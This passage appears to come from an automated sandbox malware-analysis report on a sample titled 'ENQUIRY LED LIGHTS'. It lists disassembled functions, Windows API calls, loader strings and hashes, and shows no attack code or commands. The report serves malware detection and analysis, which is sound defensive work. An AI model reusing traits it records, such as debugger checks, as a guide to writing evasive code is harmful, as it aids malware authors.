                                                                                                  • Opcode ID: 531c6c2c2d8dd0a598f6d651127fe8afacc0e6ecc84a87ed1681958ec2130ae6
                                                                                                  • Instruction ID: dbc5adb9c446bb4944e558b09e1f05f2d8c49af37213c8b1d3cda5ad57d52338
                                                                                                  • Opcode Fuzzy Hash: 531c6c2c2d8dd0a598f6d651127fe8afacc0e6ecc84a87ed1681958ec2130ae6
                                                                                                  • Instruction Fuzzy Hash: CCE092722002187BD610EF5ADC45EDB33ADEFC4710F004419FA09A7342D671B9118BB4
                                                                                                  Function 0042D18F Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 82 42d18f-42d1d3 call 4050ff call 42e0af RtlAllocateHeap
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(?,0041EDAA,?,?,00000000,?,0041EDAA,?,?,?), ref: 0042D1CE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 0681289463acc3cc7b52d519a9f1f540006482d51675ae265bd9054e089dee02
                                                                                                  • Instruction ID: 34a0491ed4f348dc09f43e599740657ff9e916aefc4db048ce6091ebc40f4c87
                                                                                                  • Opcode Fuzzy Hash: 0681289463acc3cc7b52d519a9f1f540006482d51675ae265bd9054e089dee02
                                                                                                  • Instruction Fuzzy Hash: 07E09272200319BBD614EE5ADC41F9B37ADEFC9710F004019F919A7242DA71B9108BB4
                                                                                                  Function 0042D22F Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 92 42d22f-42d26b call 4050ff call 42e0af ExitProcess
                                                                                                  APIs
                                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,1AF49429,?,?,1AF49429), ref: 0042D266
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 621844428-0
                                                                                                  • Opcode ID: 8a582c56d6ee54ff94a83fcb637bfdd31d75a77cca0da8a7d9533ef80299c1a7
                                                                                                  • Instruction ID: e4bb7007b9f6973c7047f8e7f0449fff0b032eeaf30b0c672e5c447e250503e6
                                                                                                  • Opcode Fuzzy Hash: 8a582c56d6ee54ff94a83fcb637bfdd31d75a77cca0da8a7d9533ef80299c1a7
                                                                                                  • Instruction Fuzzy Hash: 1DE04F322006147BC220AB5ADC01FAB779CDFC5714F00811AFA0867282CA75790587A4
                                                                                                  Function 02F52C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 97 2f52c0a-2f52c0f 98 2f52c11-2f52c18 97->98 99 2f52c1f-2f52c26 LdrInitializeThunk 97->99
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: fca3a3b654caf2cf445139021c9a22dc950ee477ff3d7f8fd9d7ba133d15a451
                                                                                                  • Instruction ID: 4bd305a3dee6cd2b11032581ccc63ee08d9cd8932041fa571e0440da395477af
                                                                                                  • Opcode Fuzzy Hash: fca3a3b654caf2cf445139021c9a22dc950ee477ff3d7f8fd9d7ba133d15a451
                                                                                                  • Instruction Fuzzy Hash: 69B09B71D015D5D5DA11E7604A0C7177910A7D0791F15C165D7030641F4739C1D5E175

                                                                                                  Non-executed Functions

                                                                                                  Function 02F92349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-2160512332
                                                                                                  • Opcode ID: 61ddae86f623b133f58a03bc1dc147fcc2b4b04b24660e2221b8bafa5f5349a0
                                                                                                  • Instruction ID: fc7d4793e6d9b22cdbc3a59a4d92121d97070a11d4d983fcade16e53ef5d0c39
                                                                                                  • Opcode Fuzzy Hash: 61ddae86f623b133f58a03bc1dc147fcc2b4b04b24660e2221b8bafa5f5349a0
                                                                                                  • Instruction Fuzzy Hash: 4B926D71A44341ABFB25DF24C880B6BB7E9BB84798F04491DFB95D7290D770E844CB92
                                                                                                  Function 00401540 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 279COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DefWindowProcW.USER32(00002BD0,?,?,?,00001935,00002430), ref: 004016B7
                                                                                                  • DefWindowProcW.USER32(?,00000111,?,?,00000FBC,00002430), ref: 0040176C
                                                                                                  • DestroyWindow.USER32(?,00002430), ref: 004017A2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$Proc$Destroy
                                                                                                  • String ID: 0$$2?$?$a$~
                                                                                                  • API String ID: 1749469740-306211256
                                                                                                  • Opcode ID: e4d05f687ca8ac989eb77b268d4f489fcc7bfa4fb84f0a817a7e39d544c34b07
                                                                                                  • Instruction ID: b1b3f5e835011688f4787c771ce75b8ed1efa3d01769a41d6f4d5f97c6ff9145
                                                                                                  • Opcode Fuzzy Hash: e4d05f687ca8ac989eb77b268d4f489fcc7bfa4fb84f0a817a7e39d544c34b07
                                                                                                  • Instruction Fuzzy Hash: 2991B071A042068BD71CCF19CC5566BB6E6EBD4345F48893EF586DB3E0D638D901CB86
                                                                                                  Function 02F48620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02F854CE
                                                                                                  • 8, xrefs: 02F852E3
                                                                                                  • Thread identifier, xrefs: 02F8553A
                                                                                                  • Address of the debug info found in the active list., xrefs: 02F854AE, 02F854FA
                                                                                                  • double initialized or corrupted critical section, xrefs: 02F85508
                                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 02F85543
                                                                                                  • undeleted critical section in freed memory, xrefs: 02F8542B
                                                                                                  • Critical section address., xrefs: 02F85502
                                                                                                  • Invalid debug info address of this critical section, xrefs: 02F854B6
                                                                                                  • corrupted critical section, xrefs: 02F854C2
                                                                                                  • Critical section address, xrefs: 02F85425, 02F854BC, 02F85534
                                                                                                  • Critical section debug info address, xrefs: 02F8541F, 02F8552E
                                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02F854E2
                                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02F8540A, 02F85496, 02F85519
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                  • API String ID: 0-2368682639
                                                                                                  • Opcode ID: 889ee46580658e804091189f1f1931209d6f2c827d67bc36808940140e1cee58
                                                                                                  • Instruction ID: 34cb746042775d8e0e822aabcf0b678dd2071f96037e0ee2d13fa5017cc03825
                                                                                                  • Opcode Fuzzy Hash: 889ee46580658e804091189f1f1931209d6f2c827d67bc36808940140e1cee58
                                                                                                  • Instruction Fuzzy Hash: E481BCB1E41348AFEF60DF95CC44BAEBBF6AB08754F518159F605BB680C7B1A940CB50
                                                                                                  Function 02F429F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 02F82602
                                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 02F82506
                                                                                                  • @, xrefs: 02F8259B
                                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 02F82412
                                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 02F822E4
                                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 02F8261F
                                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 02F825EB
                                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 02F82624
                                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 02F82409
                                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 02F824C0
                                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 02F82498
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                  • API String ID: 0-4009184096
                                                                                                  • Opcode ID: 332556c79969516734573bddfca1620b85f733ab8c6c0bd46131dce1f91db468
                                                                                                  • Instruction ID: 4fedde0d3c0e7019bf68cabd10396fbe6cd68aa37529b4df9ffca0ee259bf991
                                                                                                  • Opcode Fuzzy Hash: 332556c79969516734573bddfca1620b85f733ab8c6c0bd46131dce1f91db468
                                                                                                  • Instruction Fuzzy Hash: DF0241F2D002689BDB21DB14CD80B99F7B8AF44754F4041EAEB09A7241DB70AF84CF59
                                                                                                  Function 02FB8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                  • API String ID: 0-2515994595
                                                                                                  • Opcode ID: d981ad6567e8693adae4a43f17b47ecdfe107ad30237cb1285e4922cfd553895
                                                                                                  • Instruction ID: c1a5490ef567ae95dca3ac88678ef3034658cf447588fbb625072350867268aa
                                                                                                  • Opcode Fuzzy Hash: d981ad6567e8693adae4a43f17b47ecdfe107ad30237cb1285e4922cfd553895
                                                                                                  • Instruction Fuzzy Hash: EF51BEB16053169BD726DF198844BEBBBECAFD87C4F144A1EEA5A83240E770D504CB92
                                                                                                  Function 00446B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00446DCE
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00446DE3
                                                                                                  • UnhandledExceptionFilter.KERNEL32(0D), ref: 00446DEE
                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00446E0A
                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00446E11
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                  • String ID: 0D
                                                                                                  • API String ID: 2579439406-130544292
                                                                                                  • Opcode ID: 426cbef5dec75f37a7ee36de06d2c670059779ff8be0cccebe112877c9ce64d9
                                                                                                  • Instruction ID: 799a462624ea85f015d103a40f4b9072a67dec0fbb95902bc9a002659545b215
                                                                                                  • Opcode Fuzzy Hash: 426cbef5dec75f37a7ee36de06d2c670059779ff8be0cccebe112877c9ce64d9
                                                                                                  • Instruction Fuzzy Hash: 9021C4BD800304DFE710DF6AFD8A6497BA4FB0A315F10447AE50987761EBB469818F5E
                                                                                                  Function 02FC0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                  • API String ID: 0-1700792311
                                                                                                  • Opcode ID: 656b31512cd23905fe39b368f23ce51bbc7534024b4ec36ff35d7596ba53e19e
                                                                                                  • Instruction ID: 4e52846d06202211190b533ba8e5d93e256c419beaa6dceb295bce2e801be517
                                                                                                  • Opcode Fuzzy Hash: 656b31512cd23905fe39b368f23ce51bbc7534024b4ec36ff35d7596ba53e19e
                                                                                                  • Instruction Fuzzy Hash: E9D1D331A00646DFDB11EF68C950AAEBBF2FF49788F18805DE64A9B251CB34D942DF14
                                                                                                  Function 02F989B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 02F98B8F
                                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 02F98A3D
                                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 02F98A67
                                                                                                  • VerifierDebug, xrefs: 02F98CA5
                                                                                                  • VerifierDlls, xrefs: 02F98CBD
                                                                                                  • HandleTraces, xrefs: 02F98C8F
                                                                                                  • VerifierFlags, xrefs: 02F98C50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                  • API String ID: 0-3223716464
                                                                                                  • Opcode ID: f674495a76a138d4bac4338c0c743436b7aa6503f23420d39a413b004abf0f89
                                                                                                  • Instruction ID: dc7fbdf42e176f4d13dd6bada9080c4d48e6ee8ee153f6edf7a19e4025c6bae8
                                                                                                  • Opcode Fuzzy Hash: f674495a76a138d4bac4338c0c743436b7aa6503f23420d39a413b004abf0f89
                                                                                                  • Instruction Fuzzy Hash: 42911472A4A311AFFB21EF288C80B1B77A5AF467D8F054459FB466B281C774AC04CF91
                                                                                                  Function 02F1EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                  • API String ID: 0-1109411897
                                                                                                  • Opcode ID: b538e4b216987171defb2cd7c61a368e4ff546dca4aca8e30eb73003f40856d2
                                                                                                  • Instruction ID: a79aae52b94927db3c6f593c11816575e8ba6202d52331cd1d2002cb316434c2
                                                                                                  • Opcode Fuzzy Hash: b538e4b216987171defb2cd7c61a368e4ff546dca4aca8e30eb73003f40856d2
                                                                                                  • Instruction Fuzzy Hash: A4A27B75E056698FDB64CF18CD98BA9B7B1BF45384F5042EADA0DA7290DB309E81CF00
                                                                                                  Function 02F463FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-792281065
                                                                                                  • Opcode ID: 8bfbf7d9b23c0a05a21629842abf106210645feb839b9555f9f23320caf9abd5
                                                                                                  • Instruction ID: d51fd7df873f299dba401e4dd210d01874fe5d581267e0873e4a9e9ffa398af9
                                                                                                  • Opcode Fuzzy Hash: 8bfbf7d9b23c0a05a21629842abf106210645feb839b9555f9f23320caf9abd5
                                                                                                  • Instruction Fuzzy Hash: 87914731F05315DBFF25EF54DD44B6ABBA5AB02B98F40016AEB15BB2D4DBB48800CB91
                                                                                                  Function 02F0645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 02F69A2A
                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 02F699ED
                                                                                                  • LdrpInitShimEngine, xrefs: 02F699F4, 02F69A07, 02F69A30
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 02F69A11, 02F69A3A
                                                                                                  • apphelp.dll, xrefs: 02F06496
                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 02F69A01
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-204845295
                                                                                                  • Opcode ID: e93ba144d1dca3a7ed910896fa4143b1a56c3d435ef260380ee4f55f4a41e063
                                                                                                  • Instruction ID: 07ac2f6561d6c7fe216e5988654fe3893aaa8096cd1ca79a34ea9dd0219670cb
                                                                                                  • Opcode Fuzzy Hash: e93ba144d1dca3a7ed910896fa4143b1a56c3d435ef260380ee4f55f4a41e063
                                                                                                  • Instruction Fuzzy Hash: B151B1716583009FE725EF24CC85B6B77E9EF84788F004919FB869B290D771E904DB92
                                                                                                  Function 02F4C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • LdrpInitializeImportRedirection, xrefs: 02F88177, 02F881EB
                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 02F88181, 02F881F5
                                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 02F881E5
                                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 02F88170
                                                                                                  • LdrpInitializeProcess, xrefs: 02F4C6C4
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 02F4C6C3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                  • API String ID: 0-475462383
                                                                                                  • Opcode ID: bf5b632c8b9ce7bb94b36c4cce750ebb921387e7e13df713c7007dd6aa6236f9
                                                                                                  • Instruction ID: b9b688f8600892a08b6e0c8f00278ccc6a1b66a7c6cfb016863aecd55969165d
                                                                                                  • Opcode Fuzzy Hash: bf5b632c8b9ce7bb94b36c4cce750ebb921387e7e13df713c7007dd6aa6236f9
                                                                                                  • Instruction Fuzzy Hash: 383117717853459FD210FF28DC45E1BB796EF80B94F004558FB456B290DA60EC04CFA2
                                                                                                  Function 02F42674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 02F82178
                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 02F82165
                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 02F8219F
                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 02F82180
                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 02F821BF
                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 02F82160, 02F8219A, 02F821BA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                  • API String ID: 0-861424205
                                                                                                  • Opcode ID: 0b8610820a12468cc46890d272ee9123acc545f4a9b4f085fdb82240e1e84cf2
                                                                                                  • Instruction ID: 7c77a3680a3d1d05fdecda7ce6ee057bfd1b7317f76f39e6a00bef84eb2385d0
                                                                                                  • Opcode Fuzzy Hash: 0b8610820a12468cc46890d272ee9123acc545f4a9b4f085fdb82240e1e84cf2
                                                                                                  • Instruction Fuzzy Hash: 2A310536F402647BFB219A958C81F6BBB79DF54AD4F154069BF05B7140E6B0AE00C6A0
                                                                                                  Function 00401350 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 174COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(00000001,0044F898,0044F960,00CF0000,80000000,00000001,80000000,00000001,00000001,00000001,00001BFB,00000001), ref: 004013F5
                                                                                                  • ShowWindow.USER32(00000000,000062AF,00001BFB,?,75C0EBF0,?), ref: 0040146A
                                                                                                  • UpdateWindow.USER32(00000000), ref: 004014C8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$CreateShowUpdate
                                                                                                  • String ID: gfff
                                                                                                  • API String ID: 2944774295-1553575800
                                                                                                  • Opcode ID: a298da39e6cb1b178f9b1b7fca1c5b32a6fa025d71e17ce2f895d74e5f238bb1
                                                                                                  • Instruction ID: dbded9e995d4556b3bce57b781593a9fda515373593a225fb0ad90cdcd642120
                                                                                                  • Opcode Fuzzy Hash: a298da39e6cb1b178f9b1b7fca1c5b32a6fa025d71e17ce2f895d74e5f238bb1
                                                                                                  • Instruction Fuzzy Hash: 655114B1F0010957DB1C8A5ACC556BFB6A6E7D4314F18813FF906EF7E1EA78A9018784
                                                                                                  Function 02F5096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 02F52DF0: LdrInitializeThunk.NTDLL ref: 02F52DFA
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F50BA3
